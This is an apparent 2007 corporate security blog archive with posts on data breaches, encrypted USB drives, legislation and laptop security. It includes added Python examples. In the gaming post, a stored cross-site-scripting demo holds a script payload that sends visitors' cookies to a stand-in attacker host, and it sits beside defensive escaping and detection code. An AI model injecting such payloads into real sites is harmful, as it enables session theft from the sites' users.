Archive for September, 2007

Internal Threats High on Security Radar

Tuesday, September 25th, 2007

At The Security Standard conference held in Chicago on September 10th and 11th, experts met to discuss business security threats. Insider threats drew more attention from security professionals this year than they have in the past.

That is not to say that the familiar threats are no longer an issue. Malware and external attackers still concern businesses worried about infected networks and data breaches. Survey results from the conference show that outsiders still account for more security incidents, but the insider threat of data leakage is a growing concern.

Though different companies face different threats, those related to financial crime and identity theft are a high priority everywhere. It is no longer simply a matter of facing the threats; organizations must also be able to demonstrate compliance.

Nick Selby, senior analyst and director of The 451 Group’s enterprise security practice, indicates that 98% of data leaked is the result of “stupidity or accident,” not malicious intent. Policies and technology solutions can better deal with the “stupid” or “accidental” data leaks but they are unable to address intentional threats.

Attendees expressed concern over mistakes made by employees and the difficulty of tracking information once it has left the network. Experts advised companies to also consider physical threats to data (documents tossed out or recycled without shredding, equipment disposed of with data still on it) that IT security departments have at times overlooked. On that note, organizations need an effective lifecycle management program and tools such as Absolute's Computrace Data Protection to remove all sensitive information from machines at the end of their life.

Via PC World

IronKey hardware-encrypted USB flash drive

Tuesday, September 25th, 2007

Portable data devices, from laptops to flash drives, pose one of the greatest threats to data security. They are stolen or simply go missing all too frequently.

Security policies often focus on laptop security, and with software available to address that concern (including Absolute's products), it is often the flash drives that get missed.

The first thing every security policy should address is a clear definition of what data may be copied off the company network and what may not. Given how many breaches involve portable devices, rules for the appropriate use of laptops and flash drives are a logical second step. Wherever these policies start, it is important to remember that policy alone is not a strong enough safeguard against data loss.

A new physical safeguard has come on the market in the form of the IronKey hardware-encrypted USB flash drive, which IronKey positions as the most secure flash drive available. Encryption is performed by hardware on the drive itself (the vendor calls it "military-grade"), and the encryption keys are generated and held inside the drive rather than on the host computer. The user's password unlocks those keys inside the device; without it, the contents of the drive are nothing but ciphertext.

The IronKey also has a built-in safeguard against password guessing: after ten incorrect password entries the drive self-destructs, erasing its encryption keys and everything stored on it. The detail to check with any device of this kind is that the counter is enforced by the drive's own hardware rather than by software on the host; otherwise an attacker could bypass it, or copy the encrypted contents off the drive and guess passwords offline with no limit at all.

In addition, the IronKey website offers a secure web browsing service. Once the user is logged in (with the password and the drive plugged in), the service turns Firefox into a malware-protected browser.

IronKey’s hardware-encrypted flash drives and online protection services are ideal for companies who want to secure their endpoints and protect their data from leaking into the hands of unauthorized people. Equip your employees, sales people and your best customers and partners with IronKey devices, and enjoy the peace of mind that always-on hardware encryption can bring. – IronKey Enterprise

The IronKey sells for $79 (1 GB) and $149 (4 GB).
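As an added example (not IronKey's firmware or any code published by the vendor), here is a software model of the behaviour described above: a data key that exists unwrapped only inside the "device", a password that unlocks it, and a failure counter that destroys the keys on the tenth wrong guess. The key-wrapping scheme, the HMAC-based stream cipher standing in for the device's AES engine, the PBKDF2 round count and the sample passwords are all assumptions made for illustration.

```python
"""Model of a password-unlocked, hardware-encrypted drive with a self-destruct
counter. Added example for this post; NOT IronKey's firmware. Assumptions: PBKDF2
key wrapping, HMAC-SHA256 in counter mode standing in for the hardware AES
engine, and the ten-attempt limit described in the post."""
import hashlib
import hmac
import os

MAX_FAILURES = 10      # assumed limit before the keys are destroyed
KEY_LEN = 32
KDF_ROUNDS = 50_000    # assumed; makes each guess made through the device cost real work


def _kek(password: str, salt: bytes) -> bytes:
    """Key-encryption key derived from the password, computed only 'inside' the drive."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, KDF_ROUNDS, KEY_LEN)


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode: a stand-in for the hardware cipher."""
    out, block = bytearray(), 0
    while len(out) < length:
        out += hmac.new(key, nonce + block.to_bytes(8, "big"), "sha256").digest()
        block += 1
    return bytes(out[:length])


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class EncryptedDrive:
    """Persistent state (what could be read off the flash chips): salt, wrapped data
    key and a key check value. The unwrapped data key lives only in a volatile
    'register' that is cleared on lock() or self-destruct."""

    def __init__(self, password: str):
        self._salt = os.urandom(16)
        data_key = os.urandom(KEY_LEN)
        self._wrapped_key = _xor(data_key, _kek(password, self._salt))
        self._check = hmac.new(data_key, b"key-check", "sha256").digest()
        self._failures = 0
        self._destroyed = False
        self._data_key = None     # populated by a successful unlock()
        self._storage = None      # (nonce, ciphertext)

    @property
    def is_destroyed(self) -> bool:
        return self._destroyed

    def unlock(self, password: str) -> bool:
        """Load the data key if the password is right; otherwise count the failure."""
        if self._destroyed:
            return False
        candidate = _xor(self._wrapped_key, _kek(password, self._salt))
        tag = hmac.new(candidate, b"key-check", "sha256").digest()
        if hmac.compare_digest(tag, self._check):
            self._failures = 0
            self._data_key = candidate
            return True
        self._failures += 1
        if self._failures >= MAX_FAILURES:
            self._self_destruct()
        return False

    def lock(self) -> None:
        self._data_key = None

    def _self_destruct(self) -> None:
        """Zeroise keys and contents; the correct password is useless from here on."""
        self._wrapped_key = bytes(KEY_LEN)
        self._check = bytes(32)
        self._storage = None
        self._data_key = None
        self._destroyed = True

    def write(self, plaintext: bytes) -> None:
        if self._data_key is None:
            raise PermissionError("drive is locked")
        nonce = os.urandom(16)   # fresh per write so the keystream is never reused
        self._storage = (nonce, _xor(plaintext, _keystream(self._data_key, nonce, len(plaintext))))

    def read(self) -> bytes:
        if self._data_key is None:
            raise PermissionError("drive is locked")
        nonce, ciphertext = self._storage
        return _xor(ciphertext, _keystream(self._data_key, nonce, len(ciphertext)))


def guess_passwords(drive: EncryptedDrive, guesses) -> int:
    """Online guessing through the drive's own unlock path; returns attempts made
    before success or self-destruct."""
    for attempts, guess in enumerate(guesses, start=1):
        if drive.unlock(guess) or drive.is_destroyed:
            return attempts
    return len(guesses)


if __name__ == "__main__":
    drive = EncryptedDrive("correct horse battery staple")   # assumed sample password
    drive.unlock("correct horse battery staple")
    drive.write(b"customer list")
    drive.lock()
    print(guess_passwords(drive, (f"password{i}" for i in range(100))))
    print(drive.is_destroyed, drive.unlock("correct horse battery staple"))
```

The point the model makes is that every guess has to go through `unlock()`, and the tenth wrong guess wipes the wrapped key, so even the legitimate owner is locked out afterwards. That property only holds if the counter and the keys live in the device's hardware: if the salt and wrapped key could be copied off the flash, an attacker would simply run `_kek()` offline, with no counter at all.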

Via gizmodo

California Considers Merchant Data Breach Legislation

Wednesday, September 19th, 2007

California may soon pass a law holding merchants liable for data breaches. The bill (A.B. 779) would make merchants responsible for the "reasonable and actual costs" of a breach, including notification and credit card replacement costs.

The bill was proposed in response to large breaches such as the one at TJX. It has passed the California Senate Judiciary Committee but has not yet become law. Minnesota is currently the only state with a merchant breach liability law.

It is interesting to examine the premise of the bill. It would require the third party, the merchant, to bear the brunt of the costs of a breach. A merchant may be directly responsible for a breach without being solely responsible: the security policies of both the merchant and the card issuer may be at fault, and issuers could escape the consequences of their own shortcomings if they can shift the costs onto merchants.

An effective security policy covers not just the company in question but every merchant it deals with. Merchants should be required to agree to the terms of that policy (whether it mandates encryption, laptop recovery software, password protection or security training) as a condition of doing business. The passage of this bill could have wide-ranging implications for businesses, merchants and all third parties.

Via CSO Online

Privacy and Inaction: Virginia Tech

Wednesday, September 19th, 2007

The Office of the Information and Privacy Commissioner (IPC) of Ontario has released a letter written to the National Post in response to its article entitled "Privacy turns deadly."

The National Post covered the recent report on the Virginia Tech massacre. Its article points to a so-called fallacy of privacy regulations that "enabled" the massacre: it states that privacy laws prevented information about Cho's mental health from coming to light, and repeatedly kept the school and his own family from examining his mental state more closely.

Commissioner Ann Cavoukian's response, titled "Privacy is never deadly; inaction is at fault", sums up her position. She states that privacy is a fundamental freedom, and that the problems seen at Virginia Tech lie not with privacy laws but with individuals who failed to disclose information when it was required.

The laws allow vital information to be disclosed in cases involving the health and safety of individuals. If the failure to disclose stems from a misunderstanding of the laws, she points to a fact sheet on Ontario's disclosure rules.

Clearly, educators and health care professionals have fears and misunderstandings about when they may disclose private information, and the resulting delay can be dangerous in situations where the information is needed quickly.


Pfizer Suffers Second Data Breach

Wednesday, September 19th, 2007

Pfizer reported a data breach in June affecting 17,000 current and former employees. That breach was caused by unauthorized file-sharing software on a laptop.

Pfizer has now reported a second data breach, this time resulting from the theft of two laptops. It occurred in May but was only recently reported to Connecticut Attorney General Richard Blumenthal's office.

On May 31, two company laptops were stolen from a locked car. They contained personal information, including Social Security numbers, for 950 health care professionals. Axia Ltd., a management consulting firm working with Pfizer, is responsible for the breach. Pfizer was notified on June 14, and the Attorney General reportedly sent a letter the following week; that letter did not arrive until mid-August.

“I am deeply disturbed and troubled by these continuing security problems with information that should be closely safeguarded,” Blumenthal said Monday. “This kind of information should be treated as if it was cash, because it has the same value as cash to someone who might misuse it.”

This is not the first time Pfizer has delayed notification. Pfizer waited six weeks before notifying employees of the previous breach, and five weeks passed before it publicly acknowledged this second one. Blumenthal has criticized Pfizer over both breaches and has requested information about its data security and breach notification policies.

Pfizer has issued a statement indicating they are strengthening their data security practices:

“Pfizer and Axia take data security very seriously and we are both taking steps to enhance data security,” according to Goldman’s letter. “For example, Axia is adding stronger encryption features to all Axia laptops, as well as software that would be able to help Axia locate and retrieve any stolen or missing laptops. Pfizer is in the process of limiting the use of SSNs (Social Security numbers) whenever possible, and exploring a range of other data-security improvements.”

Pfizer and Axia will provide those affected with credit monitoring services, fraud resolution representatives, and $25,000 in identity theft insurance.

Read the letters between Pfizer and Attorney General Blumenthal here [PDF].

Via TheDay.com

Suspect Arrested for TJX Data Breach

Wednesday, September 19th, 2007

A suspect has now been arrested in connection with the TJX data breach, the biggest data breach in corporate history to date.

Authorities arrested a Ukrainian man, Maksym Yastremskiy, whom they believe to be the largest seller of the stolen credit card numbers. Greg Crabb, program manager in the global investigations division of the US Postal Inspection Service, hopes the arrest will be a breakthrough in the investigation. The suspect has been called:

"one of the world's important and well-known computer pirates."

Authorities believe Yastremskiy sold the card numbers through password-protected or overseas online forums, at $20 to $100 per card and in batches of up to 10,000. He is associated with individuals charged with similar crimes. The hackers who actually broke into TJX have not yet been identified.

Yastremskiy was arrested several weeks ago in Turkey, although his connection to the TJX breach has only just surfaced. As noted in a recent post, the expected cost of this breach to TJX is over $100 million.

Via Boston.com

Online Gamers at Risk for ID Theft

Thursday, September 13th, 2007

CA has released a new report exposing the risk of identity theft for gamers. Online games often have their own virtual currency, which can be converted into real cash. That puts gamers at risk: an online gaming account is becoming as profitable a target as a real bank account.

The report indicates that online gaming is becoming as risky as online banking, and that identity theft and malware aimed at gamers will increase. The second most common malware of 2007 was designed to steal gaming passwords. Character identities and virtual money are sold on underground websites whose marketplaces behave just like those of conventional identity theft rings.

Social networks, a category that includes gaming sites alongside Facebook and MySpace, are large security risks by design. They are subject to the same weaknesses as any website, but they are easier to exploit: malicious code can be inserted into pages that any user is allowed to create, and the interconnectedness of a social network spreads it very quickly.
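What the paragraph above describes is stored cross-site scripting: a page any user can create carries script that runs in the browser of everyone who views it. As an added example (not code from the CA report or from any gaming or social-networking site), the snippet below renders a constructed profile page two ways, once with raw concatenation and once with context-appropriate encoding. The field names, the cookie-stealing payload and the `attacker.example` host are invented for illustration.

```python
"""Stored XSS in user-generated content, vulnerable and hardened renderers.
Added example for this post; the template, fields and payload are constructed."""
import html
import re
from urllib.parse import urlsplit

# Constructed payload: a profile "bio" that sends the viewer's session cookie to
# an attacker. Every visitor to the profile runs it; a variant that rewrote the
# visitor's own profile would spread from friend to friend.
COOKIE_THEFT = ("<script>new Image().src='http://attacker.example/c?'"
                "+encodeURIComponent(document.cookie)</script>")

_ALLOWED_SCHEMES = {"http", "https"}


def safe_url(url: str) -> str:
    """Attribute context needs more than escaping: allowlist the scheme so that
    javascript: and data: links cannot run code when clicked."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in _ALLOWED_SCHEMES or not parts.netloc:
        return "#"
    return html.escape(url, quote=True)


def render_profile_unsafe(name: str, bio: str, homepage: str) -> str:
    """Vulnerable: user-controlled text is concatenated straight into the page."""
    return (f"<h1>{name}</h1>"
            f"<p class='bio'>{bio}</p>"
            f"<a href='{homepage}'>homepage</a>")


def render_profile_safe(name: str, bio: str, homepage: str) -> str:
    """Hardened: each user-supplied value is encoded for the context it lands in
    (text nodes get HTML escaping, the link gets scheme allowlisting as well)."""
    return (f"<h1>{html.escape(name)}</h1>"
            f"<p class='bio'>{html.escape(bio)}</p>"
            f"<a href='{safe_url(homepage)}'>homepage</a>")


_ACTIVE = re.compile(r"<script\b|\bon\w+\s*=|href='javascript:", re.IGNORECASE)


def has_active_content(page: str) -> bool:
    """Crude detector used only to show the difference between the two renderers."""
    return bool(_ACTIVE.search(page))


if __name__ == "__main__":
    args = ("guildmaster", COOKIE_THEFT, "javascript:alert(document.cookie)")
    print(has_active_content(render_profile_unsafe(*args)))
    print(has_active_content(render_profile_safe(*args)))
```

Escaping alone is not enough for the link: `html.escape` leaves `javascript:alert(...)` intact, and the browser will happily run it when the link is clicked, which is why `safe_url()` checks the scheme before the value goes into the `href` attribute.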

Beyond standard security measures, the report recommends configuring a personal firewall for safer online gaming, using an anti-phishing toolbar, and avoiding peer-to-peer networks.

You can download the full report, which covers Internet Threats of various sorts, here [PDF].

Via Smarthouse

Security Patches a Headache for IT

Thursday, September 13th, 2007

Keeping software up to date with the latest security patches is an important part of IT. Earlier studies have shown this to be an area of concern: security updates are not applied consistently across the network. Windows security patches are generally applied more regularly and consistently than others, but they remain a headache for IT.

Graham Cluley of Sophos notes just how frustrating it is to install all the latest Windows security updates:

“It may sound straightforward, but installing the latest Microsoft patches is easier said than done, particularly if you have a regular stream of visitors connecting to your network.”

“Whether it is an employee’s desktop PC or a customer’s laptop, an unpatched machine represents a possible avenue for a cyber-attack.”

Patches must be rolled out to every machine, which is difficult when some machines are not currently on the network or are misconfigured.

The latest batch of security patches was released on September 11 to address known vulnerabilities in Windows and MSN Messenger (both rated 'critical') and in Windows Services for UNIX. You can find more information here.

The Sophos statement continues:

“All organisations should rollout these patches as a matter of urgency, as some of them could enable hackers to access data on a vulnerable PC or run malicious code,” said a statement from Sophos.

The risk continues whenever unpatched computers are brought onto the office network. Since it is difficult to police the security practices of guests, customers and business partners, some form of Network Access Control, which checks a machine's patch level before granting it access to the network, should be implemented.

Via Secure Computing Magazine; hat tip to flying hamster

10 Ways to Secure your Laptop

Thursday, September 13th, 2007

Scott Lowe of TechRepublic has published an article titled "10 things you should have already done to secure your laptop". His list:

  1. Encrypt the hard drive
  2. Install tracking software (such as Computrace)
  3. Install antivirus and antispyware software
  4. Tie down the machine with a lock (hardware or software)
  5. Install a software firewall
  6. Stay current with updates
  7. Use a strong password
  8. Use wireless networks carefully
  9. Disable Windows services you don’t need
  10. Make sure your laptop is insured

Visit TechRepublic for the full article, with more details and links for further reading on each item.

For further reading, review past posts on strong passwords, wireless security, laptop locks and stay tuned to posts in our Laptop Security category.


UK Study on External Security Threats

Monday, September 10th, 2007

The National Computing Centre (NCC) in the UK has published the results of a recent survey on external IT security threats. The data identifies areas that pose serious security risks, including a lack of business support for IT security.

The survey of 190 organizations found that most companies are addressing some external threats (viruses, spam, hackers) but not others. In particular, the security of WiFi networks, VoIP and USB devices needs further attention.

Findings from the study:

  • 40% have partially secured, or completely unsecured, wireless networks
  • 15% have secured their VoIP systems
  • 20% have laptop security implemented, and another 20% have it in planning
  • 75% recognize the liability posed by USB and other portable data devices, but only 11% have controls in place
  • 25% say formal security training is not relevant or has not been considered
  • 40% indicate security training is fully or partially implemented
  • Among companies with fewer than 25 IT employees, over half have no IT security specialist
  • The median security spend was 3.3% of the IT budget

The NCC sees wireless security, in particular, as a large threat that should be addressed quickly.

Stefan Foster, MD of NCC Ltd said, “Running unsecured WiFi is like locking the front door, but leaving the windows open. Fraudsters are increasingly targeting IT systems and the growing use of WiFi is attracting their attention both inside and outside of the office environment. Unsecure wireless is putting organisations and those who interact with them at unnecessary risk.”

I was particularly intrigued that respondents did not consider internal training as necessary, when 25% of UK IT crime is internal. Overall, the data seems to indicate that security is of low priority in terms of planning and of budget.

Via Computerworld UK
